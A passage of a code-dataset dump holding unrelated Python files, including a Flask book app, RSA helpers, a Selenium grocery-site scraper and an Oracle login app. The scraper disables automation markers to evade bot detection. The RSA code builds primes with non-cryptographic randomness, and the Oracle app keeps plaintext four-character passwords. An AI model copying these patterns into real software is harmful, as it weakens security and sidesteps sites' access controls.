find('由業非以自性滅,故無賴耶亦能生')])\n local_db = pymongo.MongoClient('mongodb://localhost')['tripitaka']\n page = local_db.page.find_one({'name': 'GL_1047_1_11'}, {'ocr': 1})\n ocr1 = page['ocr']\n ocr1 = re.sub(r'[■\\|]', '', ocr1)\n txt1 = find_one(ocr1, only_match=True)[0]\n print(txt1)\n","sub_path":"controller/page/tool/esearch.py","file_name":"esearch.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260309886","text":"#!/usr/bin/python\n\nfrom GrabzIt import GrabzItBaseOptions\n\nclass GrabzItImageOptions(GrabzItBaseOptions.GrabzItBaseOptions):\n \"\"\" Available options when creating a image capture\n\n Attributes:\n\n width the width of the resulting screenshot in pixels. Use -1 to not reduce the width of the screenshot\n height the height of the resulting screenshot in pixels. Use -1 to not reduce the height of the screenshot\n browserWidth the width of the browser in pixels\n browserHeight the height of the browser in pixels. Use -1 to screenshot the whole web page\n format the format the screenshot should be in: bmp8, bmp16, bmp24, bmp, tiff, jpg, png\n delay the number of milliseconds to wait before creating the capture\n targetElement the CSS selector of the only HTML element in the web page to capture\n hideElement the CSS selector(s) of the one or more HTML elements in the web page to hide\n requestAs the user agent type should be used: Standard Browser = 0, Mobile Browser = 1, Search Engine = 2 and Fallback Browser = 3\n customWaterMarkId set a custom watermark to add to the screenshot\n quality set the quality of the screenshot where 0 is poor and 100 excellent. The default is -1 which uses the recommended quality\n \"\"\"\n\n def __init__(self):\n GrabzItBaseOptions.GrabzItBaseOptions.__init__(self)\n self.browserWidth = 0\n self.browserHeight = 0\n self.width = 0\n self.height = 0\n self.format = ''\n self.targetElement = ''\n self.hideElement = ''\n self.requestAs = 0\n self.customWaterMarkId = ''\n self.quality = -1\n \n def _getParameters(self, applicationKey, sig, callBackURL, dataName, dataValue):\n params = self._createParameters(applicationKey, sig, callBackURL, dataName, dataValue)\n params[\"width\"] = int(self.width)\n params[\"height\"] = int(self.height)\n params[\"bwidth\"] = int(self.browserWidth)\n params[\"bheight\"] = int(self.browserHeight)\n params[\"delay\"] = int(self.delay)\n params[\"format\"] = str(self.format)\n params[\"target\"] = str(self.targetElement)\n params[\"hide\"] = str(self.hideElement) \n params[\"requestmobileversion\"] = int(self.requestAs)\n params[\"customwatermarkid\"] = str(self.customWaterMarkId) \n params[\"quality\"] = int(self.quality) \n\n return params\n\n def _getSignatureString(self, applicationSecret, callBackURL, url = ''):\n urlParam = '';\n if (url != None and url != ''):\n urlParam = str(url)+\"|\"\n\n callBackURLParam = '';\n if (callBackURL != None and callBackURL != ''):\n callBackURLParam = str(callBackURL)\n\n return applicationSecret +\"|\"+ urlParam + callBackURLParam + \\\n \"|\"+str(self.format)+\"|\"+str(int(self.height))+\"|\"+str(int(self.width))+\"|\"+str(int(self.browserHeight))+\"|\"+str(int(self.browserWidth))+\"|\"+str(self.customId)+ \\\n \"|\"+str(int(self.delay))+\"|\"+str(self.targetElement)+\"|\"+str(self.customWaterMarkId)+\"|\"+str(int(self.requestAs))+\"|\"+str(self.country)+\"|\"+str(int(self.quality))+\"|\"+str(self.hideElement)\n ","sub_path":"python/GrabzIt/GrabzItImageOptions.py","file_name":"GrabzItImageOptions.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286913128","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0022_auto_20150119_1521'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='additionaldetail',\n name='type',\n field=models.SmallIntegerField(default=0, choices=[(0, 'lis\\xe4tieto'), (1, 'P\\xc4\\xc4T\\xd6S'), (2, 'Viety eteenp\\xe4in')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"content/migrations/0023_auto_20150401_1431.py","file_name":"0023_auto_20150401_1431.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"464452432","text":"#%%\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///new-books-collection.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Book(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120), unique=True, nullable=False)\n author = db.Column(db.String(120), unique=False, nullable=False)\n rating = db.Column(db.String(120), unique=False, nullable=False)\n\n def __str__(self):\n return f'{self.title} {self.author} {self.rating}'\n \ndb.create_all()\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef home():\n all_books = Book.query.all()\n \n return render_template('index.html', books=all_books)\n\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n if request.method == \"POST\":\n new_book = Book(title=request.form.get('book'), \n author=request.form.get('author'), \n rating=request.form.get('rating'))\n\n db.session.add(new_book)\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('add.html')\n\n\n@app.route(\"/edit\", methods=[\"GET\", \"POST\"])\ndef edit():\n if request.method == \"POST\":\n book_id = request.form.get('id')\n book = Book.query.get(book_id)\n \n book.rating = request.form.get('new_rating')\n db.session.commit()\n return redirect(url_for('home'))\n \n book_id = request.args.get('book_id')\n book = Book.query.get(book_id)\n return render_template('edit.html', book=book)\n\n\n@app.route(\"/delete\")\ndef delete():\n book_id = request.args.get('book_id')\n book = Book.query.get(book_id)\n db.session.delete(book)\n db.session.commit()\n \n return redirect(url_for('home'))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n# %%\n","sub_path":"day63_library_collection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351849137","text":"from random import randint\r\n\r\n#a^b (mod c)\r\ndef bin_mod_exp(a, b, c):\r\n x = 1\r\n while b > 0:\r\n if b & 1 == 1:\r\n x = (x*a) % c\r\n a = (a*a) % c\r\n b >>= 1\r\n return x\r\n\r\ndef _try_composite(a, d, n, s):\r\n if pow(a, d, n) == 1:\r\n return False\r\n for i in range(s):\r\n if pow(a, 2**i * d, n) == n-1:\r\n return False\r\n return True\r\n\r\ndef is_prime_MillerRabin(n, _precision_for_huge_n=16):\r\n if n in _known_primes or n in (0, 1):\r\n return True\r\n if any((n % p) == 0 for p in _known_primes):\r\n return False\r\n d, s = n - 1, 0\r\n while not d % 2:\r\n d, s = d >> 1, s + 1\r\n if n < 1373653:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\r\n if n < 25326001:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\r\n if n < 118670087467:\r\n if n == 3215031751:\r\n return False\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\r\n if n < 2152302898747:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\r\n if n < 3474749660383:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\r\n if n < 341550071728321:\r\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\r\n # otherwise\r\n return not any(_try_composite(a, d, n, s)\r\n for a in _known_primes[:_precision_for_huge_n])\r\n\r\n_known_primes = [2, 3]\r\n_known_primes += [x for x in range(5, 1000, 2) if is_prime_MillerRabin(x)]\r\n\r\n\r\ndef genPrime(bitLen):\r\n #random binary number\r\n binN = \"1\"\r\n for i in range(bitLen -2):\r\n binN += str(randint(0,1))\r\n binN += \"1\"\r\n n = int(binN, 2)\r\n while(not is_prime_MillerRabin(n)):\r\n n += 2\r\n return n\r\n\r\ndef extended_euclid(a, b):\r\n x,y, u,v = 0,1, 1,0\r\n while a != 0:\r\n q, r = b//a, b%a\r\n m, n = x-u*q, y-v*q\r\n b,a, x,y, u,v = a,r, u,v, m,n\r\n gcd = b\r\n return gcd, x, y\r\n\r\ndef mod_inv(a, m):\r\n gcd, x, y = extended_euclid(a, m)\r\n if gcd != 1:\r\n return None\r\n else:\r\n return x % m","sub_path":"Kryptologie/RSA/rsamath.py","file_name":"rsamath.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23358073","text":"import sentencepiece as spm\nimport pandas as pd\nimport csv\n\nSRC_DATA_PATH = '../integrated_data/korean_for_nlp.txt'\n\n\nif __name__ == '__main__':\n input = SRC_DATA_PATH\n vocab_size = '1500'\n model_type = 'unigram'\n model_prefix = 'spm_%s_%s' % (model_type, vocab_size)\n max_sentence_length = '9999'\n\n\n spm.SentencePieceTrainer.Train('--input=%s --model_prefix=%s --vocab_size=%s'\n ' --model_type=%s --max_sentence_length=%s'\n ' --pad_id=0 --pad_piece=[PAD]'\n ' --unk_id=1 --unk_piece=[UNK]'\n ' --bos_id=2 --bos_piece=[BOS]'\n ' --eos_id=3 --eos_piece=[EOS]' \n ' --user_defined_symbols=[CLS]' % (\n input, model_prefix, vocab_size, model_type, max_sentence_length))\n\n vocab_list = pd.read_csv('%s.vocab' % model_prefix, sep='\\t', header=None, quoting=csv.QUOTE_NONE)\n print(vocab_list[:10])\n\n sp = spm.SentencePieceProcessor()\n vocab_file = \"%s.model\" % model_prefix\n sp.load(vocab_file)\n\n lines = [\n '나는 안녕하세요 1+1 이벤트 진행 중이다, 가격 1300원이야.',\n \"t 값이 15,021원입니다.\"\n ]\n for line in lines:\n line = sp.IdToPiece(2) + line + sp.IdToPiece(3)\n print(line)\n print(sp.encode_as_pieces(line))\n print(sp.encode_as_ids(line))\n print()\n print(sp.IdToPiece(5))\n print(sp.piece_to_id('[BOS]'))\n","sub_path":"make_custom_sentencepiece_tokenizer.py","file_name":"make_custom_sentencepiece_tokenizer.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643282909","text":"#IMPORT AND CERTIFY FIREBASE\n\n\n #MAINSCRIPTS\n #SELENIUM\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n #TIME\nimport time\nimport datetime\n #JSON\nimport json\n #MULTIPROCESSING\nimport multiprocessing\nfrom functools import partial\n\n\n\n #SELENIUM/BROWSER DRIVER SETUP // RETURN BROWSER DRIVER // FUNCTION\ndef selenium_setup():\n #DEFINE CHROME CAPABILITIES TO WAIT FOR PAGE TO BE INTERACTIVE INSTEAD OF FULL LOAD\n chrome_capabilities = DesiredCapabilities().CHROME\n chrome_capabilities[\"pageLoadStrategy\"] = \"eager\"\n #DEFINE CHROME OPTIONS\n chrome_options = webdriver.ChromeOptions()\n user_agent ='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'\n chrome_options.add_argument(f'user-agent={user_agent}')\n chrome_options.add_argument(\"--lang=en-US,en;q=.9\")\n chrome_options.add_experimental_option(\"prefs\", {\"profile.managed_default_content_settings.images\": 2})\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"start-maximized\")\n chrome_options.add_argument(\"disable-infobars\")\n chrome_options.add_argument(\"--incognito\")\n chrome_options.add_experimental_option('excludeSwitches', ['enable-automation']) \n chrome_options.add_experimental_option('useAutomationExtension', False)\n #SET SELENIUM CHROME DRIVER CAPABILITIES/OPTIONS/PATH HERE\n browser_driver = webdriver.Chrome(desired_capabilities=chrome_capabilities, options=chrome_options, executable_path=r'C:\\Users\\Mason\\Desktop\\DeliverMeScraper\\chromedriver.exe')\n #RETURN BROWSER\n return browser_driver\n\n #RUN SELENIUM/BROWSER // RETURN SELENIUM SESSION COOKIES // FUNCTION\ndef run_selenium_browser(current_zip_code, current_city, browser_driver, url):\n #proxy.new_har(\"peapod\")\n #LOAD PEAPOD\n browser_driver.get(url)\n #FIND INITIAL ZIP CODE ELEMENTS\n zip_entry = browser_driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div/main/div/div/section[3]/div[2]/zipcode-entry/div/form/div[2]/div/label/div[1]/input')\n submit_button = browser_driver.find_element_by_xpath('/html/body/div[2]/div/div/div/div/main/div/div/section[3]/div[2]/zipcode-entry/div/form/div[2]/div/label/div[2]/button')\n #SEND INITIAL ZIP CODE INPUTS\n zip_entry.send_keys(current_zip_code)\n submit_button.click()\n #PAUSE FOR .5 SECONDS TO ENSURE OPTIONS FOR CITIES LOAD\n time.sleep(.5)\n #CHECK FOR CITIES INPUT\n try:\n #CLICK CITY DROP DOWN FOR CITY OPTIONS\n cities_entry_first_click = browser_driver.find_element_by_css_selector('#main-content > div > section.gateway-page_body-content-wrapper.gateway-page_body-content-wrapper--no-margin > div.gateway-body-content_login-wrapper.gateway-body-content_login-wrapper--rounded-corners > zipcode-entry > div > form > div.gateway-login_single-field-wrapper > div.trailer--double > label > div > div.select-field > select')\n cities_entry_first_click.click()\n #CYCLE THROUGH DROP DOWN MENU CITY OPTIONS FOR CORRECT CITY\n for cities_entry_second_click in cities_entry_first_click.find_elements_by_tag_name('option'):\n if current_city in cities_entry_second_click.text:\n cities_entry_second_click.click()\n break\n #CLICK SUBMIT TO SEND CITY SELECTION\n cities_entry_third_click = browser_driver.find_element_by_css_selector('#main-content > div > section.gateway-page_body-content-wrapper.gateway-page_body-content-wrapper--no-margin > div.gateway-body-content_login-wrapper.gateway-body-content_login-wrapper--rounded-corners > zipcode-entry > div > form > div.gateway-login_single-field-wrapper > div.button-container > div.button-container_control.button-container_control--no-outer-spacing.omega > button')\n cities_entry_third_click.click() \n except:\n pass\n #GRAB SELENIUM SESSION COOKIES / PAUSE FOR .5 SECONDS TO ENSURE GUEST COOKIES LOAD \n time.sleep(.5)\n selenium_cookies = browser_driver.get_cookies()\n #QUIT SELENIUM BROWSER / RETURN SELENIUM COOKIES\n #print(proxy.har)\n #server.stop()\n browser_driver.quit()\n return selenium_cookies\n\n #RUN AUTOMATED SELENIUM BROWSER TO GET GUEST SESSION COOKIES // RETURNS SELENIUM SESSION COOKIES // FUNCTION\ndef get_selenium_cookies(Account_Database):\n #CORRECTLY TRANSLATE/UNPACK MULTOPROCESSING ITERATED ACCOUNT DATABSE\n if (Account_Database[0].isdigit() == True):\n current_zip_code = Account_Database[0]\n current_city = Account_Database[1]\n else:\n current_zip_code = Account_Database[1]\n current_city = Account_Database[0]\n #DEFINE TARGET URL\n url = 'https://www.peapod.com'\n #EXECUTE BROWSER SETUP\n browser_driver = selenium_setup() \n #EXECUTE SELENIUM BROWSER\n selenium_cookies = run_selenium_browser(current_zip_code, current_city, browser_driver, url)\n #RETURN SELENIUM COOKIES\n return selenium_cookies\n\n #RUN AUTO BROWSER //// GET ACCOUNT INFO TO CHECK FOR AVAILABILITY -> OPEN BROWSER AND INPUT DATA TO CREATE GUEST SESSION COOKIES -> RETURN SELENIUM GUEST SESSION SELENIUM COOKIES //// FUNCTION\ndef run_auto_browser(Account_Database):\n start_time = time.time()\n print(\"\")\n #RUN PARALLEL PROCESS FOR EACH UNIQUE ZIP/CITY COMBO AND STORE SELENIUM COOKIES\n with multiprocessing.Pool(processes=len(Account_Database)) as pool:\n all_selenium_guest_session_cookies = pool.map(get_selenium_cookies, Account_Database)\n end_time = time.time()\n print(\"Selenium runtime: \" + str(end_time - start_time))\n #RETURN ALL SELENIUM GUEST SESSION COOKIES\n return all_selenium_guest_session_cookies\n\n\n\ndef create_Account_Database_Array_Function(number_Of_Accounts,values):\n width, height = 2, number_Of_Accounts\n account_Database_Array = [[0 for x in range(width)] for y in range(height)] \n n = 0\n for key in values:\n user_zip_code = values.get(key)['zip']\n user_city = values.get(key)['city']\n\n account_Database_Array[n][0] = user_zip_code\n account_Database_Array[n][1] = user_city\n n = n+1\n return account_Database_Array\n\n\n #Main function\ndef MainScout2(dataArray):\n\n\n all_selenium_guest_session_cookies = run_auto_browser(dataArray)\n return all_selenium_guest_session_cookies\n\n\n\n\n\n","sub_path":"MainScriptsUpdated/MainScout2.py","file_name":"MainScout2.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341974873","text":"#id47.py\n\nfrom p_factor import factorization\n\ndef ID47():\n numbers = [2, 3, 4, 5]\n while True:\n flen = [len(factorization(x)) for x in numbers]\n if flen == [4, 4, 4, 4]:\n return numbers[0]\n else:\n numbers = [i + 1 for i in numbers]\n\nif __name__ == '__main__':\n print(ID47())\n","sub_path":"python files/id47.py","file_name":"id47.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582401222","text":"def menu():\n print(\"Bienvenido, ingrese\\n1-Factorial\\n2-Multiplicación\\n\")\n valor = int(input())\n\n if valor == 1:\n print(\"Ingresa un numero: \")\n num = int(input())\n print(\"El numero factorial de:\", num, \"es:\", facto(num))\n elif valor == 2:\n print(\"Ingrese el valor inicial a multiplicar: \")\n num2 = int(input())\n print(\"Ingresa el numero a multiplicar: \")\n num3 = int(input())\n num4 = num2 * num3\n multi(num2, num3, num4)\n print(multi(num2, num3, num4))\n\ndef facto(num : int):\n if num == 1:\n return 1\n return num * facto(num - 1)\n\ndef multi(num2 : int, num3 : int, num4 : int):\n if num2 == num4:\n return num2\n else:\n num2 = num2 + num3\n return multi(num2, num3, num4)\n \n\nmenu()\n\n\n","sub_path":"Parcial 3/RecurMulti/RecurMulti/RecurMulti.py","file_name":"RecurMulti.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472448110","text":"#!/usr/bin/env python\n\n\"\"\"\nPass arguments not in list if only solving a 1d system\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\nfull_output = 1\n\n#Define function to be integrated\ndef f(y,t,params):\n thetaO, thetaO2 = y\n A, E1a, E_1a, E2a, beta, kb = params\n derivs = [1/beta*(-2*A*np.e**(-E1a/kb/t)*thetaO**2 + \\\n 2*A*np.e**(-E_1a/kb/t)*thetaO2),\n\n 1/beta*(A*np.e**(-E1a/kb/t)*thetaO**2 - \\\n A*np.e**(-E_1a/kb/t)*thetaO2 - A*np.e**(-E2a/kb/t)*thetaO2),\n ]\n return derivs\n\n#Parameters\nA = 10.**13 #Attempt frequency 1/s\nE1a = 0.25 #O2cc->2Oc barrier in eV\nE_1a = 1.0 #2Oc->O2cc barrier in eV\nE2a = 2 #1.27 #Desorption barrier of 2Oc\nbeta = 1. # Temperature ramp rate, K/s\nkb = 8.617*10**-5 #Boltzmann cst, eV/K\nNs = 5*10**14 #Sites/cm2\n\n#Initial Values\nthetaO2_0 = 0.2 #Initial coverage of stranded O2\nthetaO_0 = 0.8\n\n#Bundle Parameters for ODE solver\nparams = [A,E1a,E_1a,E2a,beta,kb]\n\n#Bundle initial conditions for ODE solver\ny0 = [thetaO_0,thetaO2_0]\n\n#Make indep variable array for solution\ntStop = 600.\ntInc=1.\nt= np.arange(10.,tStop,tInc)\n\n#Call the ODE Solver\npsoln = odeint(f, y0, t, args=(params,))\n\n#Differentiate to get dtheta/dT and get absiscca of t\nd=-np.diff(psoln.T)/np.diff(t)\ntd = (t[1:]+t[:-1])/2.\n\n#Calculate Desorption rate\nrd=[]\nfor thetaO2,T in zip(psoln[:,0],t):\n rate = Ns*thetaO2*A*np.e**(-E2a/kb/T)\n rd.append(rate)\n\n#Plot results\nfig = plt.figure(1,figsize=(8,8))\n\n#Plot theta as a function of Temp\nax1 = fig.add_subplot(311)\nax1.plot(t, psoln[:,1])\nax1.set_xlabel('Temp')\nax1.set_ylabel('theta')\n\n#Plot -dtheta/dT as a function of Temp\nax2 = fig.add_subplot(312)\nax2.plot(td, d.T[:,1])\nax2.set_xlabel('Temp')\nax2.set_ylabel('dtheta/dT')\n\n#Plot rate as a function of Temp\nax3 = fig.add_subplot(313)\nax3.plot(t, rd)\nax3.set_xlabel('Temp')\nax3.set_ylabel('desorption rate')\n\nplt.show()\n\n","sub_path":"TPD/RuO2_2O.py","file_name":"RuO2_2O.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"118781248","text":"import cx_Oracle\nimport sys\nimport random\nimport datetime\nimport time\nimport getpass\n\n# Connects to the database and returns the connection object\n# Uses a file named \"connection.txt\" where the first line\n# is the username and the second line is the password\n# to log into oracle\ndef getConnection():\n\tusername = input(\"Please enter the username to connect to the Oracle database: \")\n\tpassword = getpass.getpass(\"Please enter the password to connect to the Oracle database: \")\n\ttry:\n\t\treturn cx_Oracle.connect(username, password, \"gwynne.cs.ualberta.ca:1521/CRS\")\n\texcept cx_Oracle.DatabaseError as exc:\n\t\terror = exc.args\n\t\tprint(sys.stderr, \"Oracle code:\", error.code)\n\t\tprint(sys.stderr, \"Oracle message:\", error.message)\n\t\tsys.exit()\n\n# Asks the user if they want to login, create an account, or exit\n# and call login(), createAccount(), or exit() appropriatly\n# Returns a tuple (a, b) where A is a boolean representing\n# whether a new account was created or not, and B is the users user_id\ndef displayLoginOrCreate(connection):\n\twhile (True):\n\t\tinp = input(\"Type 'login' to login, 'create' to create an account, or 'exit' to exit: \")\n\t\tif inp == \"exit\":\n\t\t\tconnection.close()\n\t\t\tsys.exit()\n\t\telif inp == \"login\":\n\t\t\tuser_id = login(connection)\n\t\t\tif (user_id == False):\n\t\t\t\tprint(\"Invalid user id/password.\")\n\t\t\telse:\n\t\t\t\tprint(\"Successfully logged in.\")\n\t\t\t\treturn (False, user_id)\n\t\telif inp == \"create\":\n\t\t\tuser_id = createAccount(connection)\n\t\t\tconnection.commit()\n\t\t\tprint(\"Successfully created an account and logged in.\")\n\t\t\treturn (True, user_id)\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Trys to log in using a user id and password\n# On success returns the user id, else returns false\ndef login(connection):\n\twhile (True):\n\t\tuser_id = input(\"Please input your user id: \")\n\t\ttry:\n\t\t\tuser_id = int(user_id)\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"User id must be an integer.\")\n\tuser_password = input(\"Please input your password: \")\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from users where usr = :id and trim(pwd) = :password\")\n\tcurs.execute(None, {'id':user_id, 'password':user_password})\n\tif curs.fetchone():\n\t\tcurs.close()\n\t\treturn user_id\n\telse:\n\t\tcurs.close()\n\t\treturn False\n\n# Creates a new account and returns the user id given by the system\ndef createAccount(connection):\n\tuser_name = \"\"\n\tuser_email = \"\"\n\tuser_city = \"\"\n\tuser_timezone = 0\n\tuser_password = \"\"\n\tuser_id = random.randrange(-2147483648, 2147483647) #-2^31 to (2^31)-1\n\twhile (True):\n\t\tuser_name = input(\"Please input a name: \")\n\t\tif len(user_name) > 20:\n\t\t\tprint(\"Maximum length of name is 20.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_email = input(\"Please enter an email: \")\n\t\tif len(user_email) > 15:\n\t\t\tprint(\"Maximum length of email is 15.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_city = input(\"Please enter a city: \")\n\t\tif len(user_city) > 12:\n\t\t\tprint(\"Maximum length of city is 12.\")\n\t\telse:\n\t\t\tbreak\n\twhile (True):\n\t\tuser_timezone = input(\"Please enter a timezone: \")\n\t\ttry:\n\t\t\tuser_timezone = float(user_timezone)\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Timezone must be a float.\")\n\twhile (True):\n\t\tuser_password = input(\"Please enter a password: \")\n\t\tif len(user_password) > 4:\n\t\t\tprint(\"Maximum length of password is 4.\")\n\t\telse:\n\t\t\tbreak\n\n\t# Check that the user id is unique\n\twhile (True):\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from users where usr = :id\")\n\t\tcurs.execute(None, {'id':user_id})\n\t\tif curs.fetchone():\n\t\t\tuser_id = random.randrange(-2147483648, 2147483647)\n\t\t\tcurs.close()\n\t\telse:\n\t\t\tprint(\"User id is: \", user_id)\n\t\t\tcurs.close()\n\t\t\tbreak\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into users values (:id, :pwd, :name, :email, :city, :timezone)\")\n\tcurs.execute(None, {'id':user_id, 'pwd':user_password, 'name':user_name, 'email':user_email, 'city':user_city, 'timezone':user_timezone})\n\tcurs.close()\n\tconnection.commit()\n\treturn user_id\n\n# Displays all tweets and retweets from users that user_id follows\n# Also asks the user if they want to see more information about a tweet\ndef displayTweetsAndRetweets(connection, user_id):\n\trows = getTweetsFromFollowedUsers(connection, user_id)\n\tif len(rows) > 0:\n\t\tprint()\n\t\tprint(\"Tweets/retweets from the users you follow:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(str(i) + \" (\" + str(rows[i-1][0]) + \", \" + str(rows[i-1][1]) + \", \" + str(rows[i-1][2]) + \", \" + str(rows[i-1][3]).strip() + \", \" + str(rows[i-1][4]) + \")\")\n\n\t\t\t# Either 5 tweets/retweets have been printed or we have reached the end of the tweets/retweets\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tprint()\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets/retweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 tweets/retweets were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if only a single tweet/retweet was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the tweet, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % (i))\n\t\t\t\t\t\t# Either 2, 3, or 4 tweets/retweets were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-(i%5) + 1), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweets/retweets\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more tweets/retweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweet, \"\n\t\t\t\t\t\t\"'more' to view the next 5 tweets, or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweets/retweets\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\t\tprint()\n\t\t\t\t# A tweet was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayTweetStats(connection, user_id, rows[int(inp)-1][0])\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No tweets/retweets from users you follow.\")\n\n# Returns all tweets/retweets from users that the logged in user follows\ndef getTweetsFromFollowedUsers(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from \"\n\t\t\t\t\"((select t.tid, t.writer, t.tdate, t.text, t.replyto \"\n\t\t\t\t\"from follows f, tweets t \"\n\t\t\t\t\"where f.flwer = :id and t.writer = f.flwee) \"\n\t\t\t\t\"union (select t.tid, t.usr as writer, t.rdate as tdate, ot.text, ot.replyto \"\n\t\t\t\t\"from follows f, retweets t, tweets ot \"\n\t\t\t\t\"where f.flwer = :id and t.usr = f.flwee and t.tid = ot.tid)) \"\n\t\t\t\t\"order by tdate desc\")\n\tcurs.execute(None, {'id':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Displays the tweet stats and asks the user if he wants to reply or retweet\ndef displayTweetStats(connection, user_id, tweet_id):\n\tstats = getTweetStats(connection, tweet_id)\n\tprint()\n\tprint(\"(\" + str(stats[0]) + \", \" + str(stats[1]) + \", \" + 